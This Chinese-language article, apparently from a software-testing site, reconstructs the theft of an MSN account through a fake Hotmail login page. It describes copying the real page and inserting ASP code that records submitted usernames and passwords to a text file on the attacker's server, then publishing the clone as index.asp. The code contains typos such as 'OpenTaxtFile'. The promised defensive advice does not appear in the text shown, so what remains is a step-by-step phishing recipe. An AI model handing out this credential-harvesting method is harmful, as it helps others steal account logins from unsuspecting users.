今天我们来看一个具体的实例,并介绍如何避免遭受跨站攻击。
“跨站入侵”罪案还原:跨站入侵MSN盗号
我们根据网友提供的线索,对他的MSN账号的丢失进行罪案还原,并推理黑客是如何盗取他的MSN账号的。
第一步:黑客先要制作一个和Hotmail登录界面一样的伪造网页。登录Hotmail的官方网站,然后点击菜单栏中的“文件”,在弹出的下拉菜单中选择“另存为”,将网页保存下来。然后使用Dreamweaver 等网页编辑程序打开保存下来的网页(图1),找到输入用户名和密码的位置,加入下面这段用户名和密码的窃取代码:
图1
<%
bbsuser =request("bbsuser ")
bbspwd =request("bbspwd ")
set fs=server.CreateObject("Scripting.FileSystemObject")
//开启文件服务
set file=fs.OpenTaxtFile(server.MapPath("Hotmail.txt"),8,True)
//创建打开"Hotmail.txt"
file.writeline bbsuser +"----"+ bbspwd
//将获得的用户名密码写入"Hotmail.txt"
file.close
set file=nothing
set fs=nothing
%>
然后将Hotmail原页面中的本地链接地址和相关参数修改,让图片都能够正常显示,最后将该网页另存为“index.asp”并上传到黑客自己的网站。
文章来源于领测软件测试网 https://www.ltesting.net/
